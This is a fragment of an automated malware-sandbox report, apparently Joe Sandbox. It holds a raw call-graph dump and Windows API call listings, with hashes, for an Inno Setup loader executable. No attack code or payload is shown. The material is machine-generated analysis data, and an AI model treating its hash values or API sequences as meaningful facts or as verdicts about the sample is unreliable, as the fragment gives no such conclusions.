5815->5814 5817 401348 5816->5817 5818 4012e4 LocalAlloc 5817->5818 5819 40138f 5818->5819 5819->5790 5823 40153b 5820->5823 5821 401594 5821->5796 5822 401568 VirtualFree 5822->5823 5823->5821 5823->5822 5827 40128c 5824->5827 5828 401298 LocalAlloc 5827->5828 5829 4012aa 5827->5829 5828->5829 5829->5808 5829->5811 5831 401d92 5830->5831 5832 401d89 5830->5832 5831->5800 5832->5831 5839 401b74 5832->5839 5835 401b61 5834->5835 5836 401b52 5834->5836 5835->5802 5837 401d00 9 API calls 5836->5837 5838 401b5f 5837->5838 5838->5802 5842 40215c 5839->5842 5841 401b95 5841->5831 5843 40217a 5842->5843 5844 402175 5842->5844 5846 4021ab RtlEnterCriticalSection 5843->5846 5849 40217e 5843->5849 5852 4021b5 5843->5852 5845 401918 4 API calls 5844->5845 5845->5843 5846->5852 5847 4021c1 5850 4022e3 RtlLeaveCriticalSection 5847->5850 5851 4022ed 5847->5851 5848 402244 5848->5849 5853 401d80 7 API calls 5848->5853 5849->5841 5850->5851 5851->5841 5852->5847 5852->5848 5854 402270 5852->5854 5853->5849 5854->5847 5855 401d00 7 API calls 5854->5855 5855->5847 5857 401c7a 5856->5857 5858 401c9d 5857->5858 5859 401caf 5857->5859 5869 40188c 5858->5869 5861 40188c 3 API calls 5859->5861 5862 401cad 5861->5862 5863 401b44 9 API calls 5862->5863 5868 401cc5 5862->5868 5864 401cd4 5863->5864 5865 401cee 5864->5865 5879 401b98 5864->5879 5884 4013a0 5865->5884 5868->5785 5870 4018b2 5869->5870 5878 40190b 5869->5878 5888 401658 5870->5888 5873 40132c LocalAlloc 5874 4018cf 5873->5874 5875 4018e6 5874->5875 5876 40150c VirtualFree 5874->5876 5877 4013a0 LocalAlloc 5875->5877 5875->5878 5876->5875 5877->5878 5878->5862 5880 401b9d 5879->5880 5882 401bab 5879->5882 5881 401b74 9 API calls 5880->5881 5883 401baa 5881->5883 5882->5865 5883->5865 5885 4013ab 5884->5885 5886 4012e4 LocalAlloc 5885->5886 5887 4013c6 5885->5887 5886->5887 5887->5868 5890 40168f 5888->5890 5889 4016cf 5889->5873 5890->5889 5891 4016a9 VirtualFree 5890->5891 5891->5890 6848 402dfa 6849 402e26 6848->6849 6850 
402e0d 6848->6850 6852 402ba4 6850->6852 6853 402bc9 6852->6853 6854 402bad 6852->6854 6853->6849 6855 402bb5 RaiseException 6854->6855 6855->6853 6856 4075fa GetFileSize 6857 407626 6856->6857 6858 407616 GetLastError 6856->6858 6858->6857 6859 40761f 6858->6859 6860 40748c 35 API calls 6859->6860 6860->6857 6861 406ffb 6862 407008 SetErrorMode 6861->6862 6530 403a80 CloseHandle 6531 403a90 6530->6531 6532 403a91 GetLastError 6530->6532 6533 404283 6534 4042c3 6533->6534 6535 403154 4 API calls 6534->6535 6536 404323 6535->6536 6863 404185 6864 4041ff 6863->6864 6865 403154 4 API calls 6864->6865 6866 4041cc 6864->6866 6867 404323 6865->6867 6537 403e87 6538 403e4c 6537->6538 6539 403e62 6538->6539 6540 403e7b 6538->6540 6541 403e67 6538->6541 6546 403cc8 6539->6546 6542 402674 4 API calls 6540->6542 6544 403e78 6541->6544 6550 402674 6541->6550 6542->6544 6547 403cd6 6546->6547 6548 402674 4 API calls 6547->6548 6549 403ceb 6547->6549 6548->6549 6549->6541 6551 403154 4 API calls 6550->6551 6552 40267a 6551->6552 6552->6544 6561 407e90 6562 407eb8 VirtualFree 6561->6562 6563 407e9d 6562->6563 6566 403e95 6567 403e4c 6566->6567 6568 403e62 6567->6568 6569 403e7b 6567->6569 6570 403e67 6567->6570 6572 403cc8 4 API calls 6568->6572 6571 402674 4 API calls 6569->6571 6573 403e78 6570->6573 6574 402674 4 API calls 6570->6574 6571->6573 6572->6570 6574->6573 6575 40ac97 6584 4096fc 6575->6584 6578 402f24 5 API calls 6579 40aca1 6578->6579 6580 403198 4 API calls 6579->6580 6581 40acc0 6580->6581 6582 403198 4 API calls 6581->6582 6583 40acc8 6582->6583 6593 4056ac 6584->6593 6586 409745 6589 403198 4 API calls 6586->6589 6587 409717 6587->6586 6599 40720c 6587->6599 6591 40975a 6589->6591 6590 409735 6592 40973d MessageBoxA 6590->6592 6591->6578 6591->6579 6592->6586 6594 403154 4 API calls 6593->6594 6595 4056b1 6594->6595 6596 4056c9 6595->6596 6597 403154 4 API calls 6595->6597 6596->6587 6598 4056bf 6597->6598 6598->6587 6600 4056ac 4 API calls 6599->6600 6601 
40721b 6600->6601 6602 407221 6601->6602 6603 40722f 6601->6603 6604 40322c 4 API calls 6602->6604 6606 40724b 6603->6606 6607 40723f 6603->6607 6605 40722d 6604->6605 6605->6590 6617 4032b8 6606->6617 6610 4071d0 6607->6610 6611 40322c 4 API calls 6610->6611 6612 4071df 6611->6612 6613 4071fc 6612->6613 6614 406950 CharPrevA 6612->6614 6613->6605 6615 4071eb 6614->6615 6615->6613 6616 4032fc 18 API calls 6615->6616 6616->6613 6618 403278 18 API calls 6617->6618 6619 4032c2 6618->6619 6619->6605 6620 403a97 6621 403aac 6620->6621 6622 403bbc GetStdHandle 6621->6622 6623 403b0e CreateFileA 6621->6623 6624 403ab2 6621->6624 6625 403c17 GetLastError 6622->6625 6637 403bba 6622->6637 6623->6625 6626 403b2c 6623->6626 6625->6624 6628 403b3b GetFileSize 6626->6628 6626->6637 6628->6625 6629 403b4e SetFilePointer 6628->6629 6629->6625 6633 403b6a ReadFile 6629->6633 6630 403be7 GetFileType 6630->6624 6632 403c02 CloseHandle 6630->6632 6632->6624 6633->6625 6634 403b8c 6633->6634 6635 403b9f SetFilePointer 6634->6635 6634->6637 6635->6625 6636 403bb0 SetEndOfFile 6635->6636 6636->6625 6636->6637 6637->6624 6637->6630 6642 40aaa2 6643 40aad2 6642->6643 6644 40aadc CreateWindowExA SetWindowLongA 6643->6644 6645 405194 33 API calls 6644->6645 6646 40ab5f 6645->6646 6647 4032fc 18 API calls 6646->6647 6648 40ab6d 6647->6648 6649 4032fc 18 API calls 6648->6649 6650 40ab7a 6649->6650 6651 406b7c 19 API calls 6650->6651 6652 40ab86 6651->6652 6653 4032fc 18 API calls 6652->6653 6654 40ab8f 6653->6654 6655 4099ec 43 API calls 6654->6655 6656 40aba1 6655->6656 6657 4098cc 19 API calls 6656->6657 6658 40abb4 6656->6658 6657->6658 6659 40abed 6658->6659 6660 4094d8 9 API calls 6658->6660 6661 40ac06 6659->6661 6664 40ac00 RemoveDirectoryA 6659->6664 6660->6659 6662 40ac1a 6661->6662 6663 40ac0f DestroyWindow 6661->6663 6665 40ac42 6662->6665 6666 40357c 4 API calls 6662->6666 6663->6662 6664->6661 6667 40ac38 6666->6667 6668 4025ac 4 API calls 6667->6668 6668->6665 6880 405ba2 6882 
405ba4 6880->6882 6881 405be0 6885 405940 19 API calls 6881->6885 6882->6881 6883 405bf7 6882->6883 6884 405bda 6882->6884 6888 404cdc 19 API calls 6883->6888 6884->6881 6886 405c4c 6884->6886 6893 405bf3 6885->6893 6887 4059b0 33 API calls 6886->6887 6887->6893 6889 405c20 6888->6889 6892 4059b0 33 API calls 6889->6892 6890 403198 4 API calls 6891 405c86 6890->6891 6892->6893 6893->6890 6894 408da4 6895 408dc8 6894->6895 6896 408c80 18 API calls 6895->6896 6897 408dd1 6896->6897 6669 402caa 6670 403154 4 API calls 6669->6670 6671 402caf 6670->6671 6912 4011aa 6913 4011ac GetStdHandle 6912->6913 6672 4028ac 6673 402594 18 API calls 6672->6673 6674 4028b6 6673->6674 4984 40aab4 4985 40aab8 SetLastError 4984->4985 5016 409648 GetLastError 4985->5016 4989 40aad2 4990 40aadc CreateWindowExA SetWindowLongA 4989->4990 5029 405194 4990->5029 4994 40ab6d 4995 4032fc 18 API calls 4994->4995 4996 40ab7a 4995->4996 5046 406b7c GetCommandLineA 4996->5046 4999 4032fc 18 API calls 5000 40ab8f 4999->5000 5051 4099ec 5000->5051 5002 40aba1 5004 40abb4 5002->5004 5072 4098cc 5002->5072 5005 40abd4 5004->5005 5006 40abed 5004->5006 5078 4094d8 5005->5078 5008 40ac06 5006->5008 5011 40ac00 RemoveDirectoryA 5006->5011 5009 40ac1a 5008->5009 5010 40ac0f DestroyWindow 5008->5010 5015 40ac42 5009->5015 5086 40357c 5009->5086 5010->5009 5011->5008 5013 40ac38 5099 4025ac 5013->5099 5103 404c94 5016->5103 5024 4096c3 5118 4031b8 5024->5118 5030 4051a8 33 API calls 5029->5030 5031 4051a3 5030->5031 5032 4032fc 5031->5032 5033 403300 5032->5033 5034 40333f 5032->5034 5035 4031e8 5033->5035 5036 40330a 5033->5036 5034->4994 5042 403254 18 API calls 5035->5042 5043 4031fc 5035->5043 5037 403334 5036->5037 5038 40331d 5036->5038 5039 4034f0 18 API calls 5037->5039 5279 4034f0 5038->5279 5045 403322 5039->5045 5040 403228 5040->4994 5042->5043 5043->5040 5044 4025ac 4 API calls 5043->5044 5044->5040 5045->4994 5305 406af0 5046->5305 5048 406ba1 5049 403198 4 API calls 5048->5049 5050 406bbf 
5049->5050 5050->4999 5319 4033b4 5051->5319 5053 409a27 5054 409a59 CreateProcessA 5053->5054 5055 409a65 5054->5055 5056 409a6c CloseHandle 5054->5056 5057 409648 35 API calls 5055->5057 5058 409a75 5056->5058 5057->5056 5059 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5058->5059 5060 409a7a MsgWaitForMultipleObjects 5059->5060 5060->5058 5061 409a91 5060->5061 5062 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5061->5062 5063 409a96 GetExitCodeProcess CloseHandle 5062->5063 5064 409ab6 5063->5064 5065 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5064->5065 5066 409abe 5065->5066 5066->5002 5067 402f24 5068 403154 4 API calls 5067->5068 5069 402f29 5068->5069 5325 402bcc 5069->5325 5071 402f51 5071->5071 5073 40990e 5072->5073 5074 4098d4 5072->5074 5073->5004 5074->5073 5075 403420 18 API calls 5074->5075 5076 409908 5075->5076 5328 408e80 5076->5328 5079 409532 5078->5079 5083 4094eb 5078->5083 5079->5006 5080 4094f3 Sleep 5080->5083 5081 409503 Sleep 5081->5083 5083->5079 5083->5080 5083->5081 5084 40951a GetLastError 5083->5084 5351 408fbc 5083->5351 5084->5079 5085 409524 GetLastError 5084->5085 5085->5079 5085->5083 5087 403591 5086->5087 5088 4035a0 5086->5088 5091 4035d0 5087->5091 5092 40359b 5087->5092 5096 4035b6 5087->5096 5089 4035b1 5088->5089 5090 4035b8 5088->5090 5093 403198 4 API calls 5089->5093 5094 4031b8 4 API calls 5090->5094 5091->5096 5097 40357c 4 API calls 5091->5097 5092->5088 5095 4035ec 5092->5095 5093->5096 5094->5096 5095->5096 5368 403554 5095->5368 5096->5013 5097->5091 5100 4025b0 5099->5100 5101 4025ba 5099->5101 5100->5101 5102 403154 4 API calls 5100->5102 5101->5015 5102->5101 5126 4051a8 5103->5126 5106 407284 FormatMessageA 5107 4072aa 5106->5107 5108 403278 18 API calls 5107->5108 5109 4072c7 5108->5109 5110 408da8 5109->5110 5111 408dc8 5110->5111 5269 408c80 5111->5269 5114 405890 5115 405897 5114->5115 5116 4031e8 18 API calls 5115->5116 5117 4058af 5116->5117 5117->5024 5120 4031be 
5118->5120 5119 4031e3 5122 403198 5119->5122 5120->5119 5121 4025ac 4 API calls 5120->5121 5121->5120 5123 4031b7 5122->5123 5124 40319e 5122->5124 5123->4989 5123->5067 5124->5123 5125 4025ac 4 API calls 5124->5125 5125->5123 5127 4051c5 5126->5127 5134 404e58 5127->5134 5130 4051f1 5139 403278 5130->5139 5136 404e73 5134->5136 5135 404e85 5135->5130 5144 404be4 5135->5144 5136->5135 5147 404f7a 5136->5147 5154 404e4c 5136->5154 5140 403254 18 API calls 5139->5140 5141 403288 5140->5141 5142 403198 4 API calls 5141->5142 5143 4032a0 5142->5143 5143->5106 5261 405940 5144->5261 5146 404bf5 5146->5130 5148 404f8b 5147->5148 5151 404fd9 5147->5151 5148->5151 5152 40505f 5148->5152 5150 404ff7 5150->5136 5151->5150 5157 404df4 5151->5157 5152->5150 5161 404e38 5152->5161 5155 403198 4 API calls 5154->5155 5156 404e56 5155->5156 5156->5136 5158 404e02 5157->5158 5164 404bfc 5158->5164 5160 404e30 5160->5151 5191 4039a4 5161->5191 5167 4059b0 5164->5167 5166 404c15 5166->5160 5168 4059be 5167->5168 5177 404cdc LoadStringA 5168->5177 5171 405194 33 API calls 5172 4059f6 5171->5172 5180 4031e8 5172->5180 5175 4031b8 4 API calls 5176 405a1b 5175->5176 5176->5166 5178 403278 18 API calls 5177->5178 5179 404d09 5178->5179 5179->5171 5181 4031ec 5180->5181 5184 4031fc 5180->5184 5181->5184 5186 403254 5181->5186 5182 403228 5182->5175 5184->5182 5185 4025ac 4 API calls 5184->5185 5185->5182 5187 403274 5186->5187 5188 403258 5186->5188 5187->5184 5189 402594 18 API calls 5188->5189 5190 403261 5189->5190 5190->5184 5192 4039ab 5191->5192 5197 4038b4 5192->5197 5194 4039cb 5195 403198 4 API calls 5194->5195 5196 4039d2 5195->5196 5196->5150 5198 4038d5 5197->5198 5199 4038c8 5197->5199 5201 403934 5198->5201 5202 4038db 5198->5202 5225 403780 5199->5225 5203 403993 5201->5203 5204 40393b 5201->5204 5205 4038e1 5202->5205 5206 4038ee 5202->5206 5208 4037f4 3 API calls 5203->5208 5209 403941 5204->5209 5210 40394b 5204->5210 5232 403894 5205->5232 5207 403894 6 API calls 
5206->5207 5213 4038fc 5207->5213 5211 4038d0 5208->5211 5247 403864 5209->5247 5215 4037f4 3 API calls 5210->5215 5211->5194 5237 4037f4 5213->5237 5217 40395d 5215->5217 5218 403864 23 API calls 5217->5218 5220 403976 5218->5220 5219 403917 5243 40374c 5219->5243 5222 40374c VariantClear 5220->5222 5224 40398b 5222->5224 5223 40392c 5223->5194 5224->5194 5226 4037f0 5225->5226 5227 403744 5225->5227 5226->5211 5227->5225 5228 4037ab 5227->5228 5229 403793 VariantClear 5227->5229 5230 4037dc VariantCopyInd 5227->5230 5231 403198 4 API calls 5227->5231 5228->5211 5229->5227 5230->5226 5230->5227 5231->5227 5252 4036b8 5232->5252 5235 40374c VariantClear 5236 4038a9 5235->5236 5236->5211 5238 403845 VariantChangeTypeEx 5237->5238 5239 40380a VariantChangeTypeEx 5237->5239 5240 403832 5238->5240 5241 403826 5239->5241 5240->5219 5242 40374c VariantClear 5241->5242 5242->5240 5244 403766 5243->5244 5245 403759 5243->5245 5244->5223 5245->5244 5246 403779 VariantClear 5245->5246 5246->5223 5258 40369c SysStringLen 5247->5258 5250 40374c VariantClear 5251 403882 5250->5251 5251->5211 5253 4036cb 5252->5253 5254 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5253->5254 5255 4036db 5253->5255 5256 40372e 5254->5256 5257 4036ed MultiByteToWideChar SysAllocStringLen 5255->5257 5256->5235 5257->5256 5259 403610 21 API calls 5258->5259 5260 4036b3 5259->5260 5260->5250 5262 40594c 5261->5262 5263 404cdc 19 API calls 5262->5263 5264 405972 5263->5264 5265 4031e8 18 API calls 5264->5265 5266 40597d 5265->5266 5267 403198 4 API calls 5266->5267 5268 405992 5267->5268 5268->5146 5270 403198 4 API calls 5269->5270 5272 408cb1 5269->5272 5270->5272 5271 4031b8 4 API calls 5273 408d69 5271->5273 5274 408cc8 5272->5274 5275 403278 18 API calls 5272->5275 5277 408cdc 5272->5277 5278 4032fc 18 API calls 5272->5278 5273->5114 5276 4032fc 18 API calls 5274->5276 5275->5272 5276->5277 5277->5271 5278->5272 5280 4034fd 5279->5280 5287 40352d 5279->5287 5281 403526 
5280->5281 5283 403509 5280->5283 5284 403254 18 API calls 5281->5284 5282 403198 4 API calls 5285 403517 5282->5285 5288 4025c4 5283->5288 5284->5287 5285->5045 5287->5282 5289 4025ca 5288->5289 5290 4025dc 5289->5290 5292 403154 5289->5292 5290->5285 5290->5290 5293 403164 5292->5293 5294 40318c TlsGetValue 5292->5294 5293->5290 5295 403196 5294->5295 5296 40316f 5294->5296 5295->5290 5300 40310c 5296->5300 5298 403174 TlsGetValue 5299 403184 5298->5299 5299->5290 5301 403120 LocalAlloc 5300->5301 5302 403116 5300->5302 5303 40313e TlsSetValue 5301->5303 5304 403132 5301->5304 5302->5301 5303->5304 5304->5298 5306 406b1c 5305->5306 5307 403278 18 API calls 5306->5307 5308 406b29 5307->5308 5315 403420 5308->5315 5310 406b31 5311 4031e8 18 API calls 5310->5311 5312 406b49 5311->5312 5313 403198 4 API calls 5312->5313 5314 406b6b 5313->5314 5314->5048 5316 403426 5315->5316 5318 403437 5315->5318 5317 403254 18 API calls 5316->5317 5316->5318 5317->5318 5318->5310 5320 4033bc 5319->5320 5321 403254 18 API calls 5320->5321 5322 4033cf 5321->5322 5323 4031e8 18 API calls 5322->5323 5324 4033f7 5323->5324 5326 402bd5 RaiseException 5325->5326 5327 402be6 5325->5327 5326->5327 5327->5071 5329 408e8e 5328->5329 5331 408ea6 5329->5331 5341 408e18 5329->5341 5332 408e18 18 API calls 5331->5332 5333 408eca 5331->5333 5332->5333 5344 407918 5333->5344 5335 408ee5 5336 408e18 18 API calls 5335->5336 5337 408ef8 5335->5337 5336->5337 5338 408e18 18 API calls 5337->5338 5339 403278 18 API calls 5337->5339 5340 408f27 5337->5340 5338->5337 5339->5337 5340->5073 5342 405890 18 API calls 5341->5342 5343 408e29 5342->5343 5343->5331 5347 4078c4 5344->5347 5348 4078d6 5347->5348 5349 4078e7 5347->5349 5350 4078db InterlockedExchange 5348->5350 5349->5335 5350->5349 5359 408f70 5351->5359 5353 408fd2 5354 408fd6 5353->5354 5355 408ff2 DeleteFileA GetLastError 5353->5355 5354->5083 5356 409010 5355->5356 5365 408fac 5356->5365 5360 408f7a 5359->5360 5361 408f7e 5359->5361 5360->5353 
5362 408fa0 SetLastError 5361->5362 5363 408f87 Wow64DisableWow64FsRedirection 5361->5363 5364 408f9b 5362->5364 5363->5364 5364->5353 5366 408fb1 Wow64RevertWow64FsRedirection 5365->5366 5367 408fbb 5365->5367 5366->5367 5367->5083 5370 403566 5368->5370 5371 403578 5370->5371 5372 403604 5370->5372 5371->5095 5373 40357c 5372->5373 5376 40359b 5373->5376 5379 4035a0 5373->5379 5381 4035b6 5373->5381 5382 4035d0 5373->5382 5374 4035b1 5377 403198 4 API calls 5374->5377 5375 4035b8 5378 4031b8 4 API calls 5375->5378 5376->5379 5380 4035ec 5376->5380 5377->5381 5378->5381 5379->5374 5379->5375 5380->5381 5384 403554 4 API calls 5380->5384 5381->5370 5382->5381 5383 40357c 4 API calls 5382->5383 5383->5382 5384->5380 6675 401ab9 6676 401a96 6675->6676 6677 401aa9 RtlDeleteCriticalSection 6676->6677 6678 401a9f RtlLeaveCriticalSection 6676->6678 6678->6677

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                                      • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                                      • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2441996862-0
                                                                                                      • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                      • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                                      • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                                      • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                                      APIs
                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                      • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                                      • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                                      • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                      • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                      • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                      • API String ID: 3256987805-3653653586
                                                                                                      • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                      • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                      • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                      • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                                        • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,020924CC), ref: 0040966C
                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                      • SetWindowLongA.USER32(00010434,000000FC,00409960), ref: 0040AB15
                                                                                                      • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                      • DestroyWindow.USER32(00010434,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                                      • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                      • API String ID: 3757039580-3001827809
                                                                                                      • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                      • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                                      • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                      • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                      • API String ID: 1646373207-2130885113
                                                                                                      • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                      • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                                      • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                      • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                      • SetWindowLongA.USER32(00010434,000000FC,00409960), ref: 0040AB15
                                                                                                        • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                                        • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020924CC,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                        • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020924CC,00409AD8,00000000), ref: 00409A70
                                                                                                        • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                        • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                        • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,020924CC,00409AD8), ref: 00409AA4
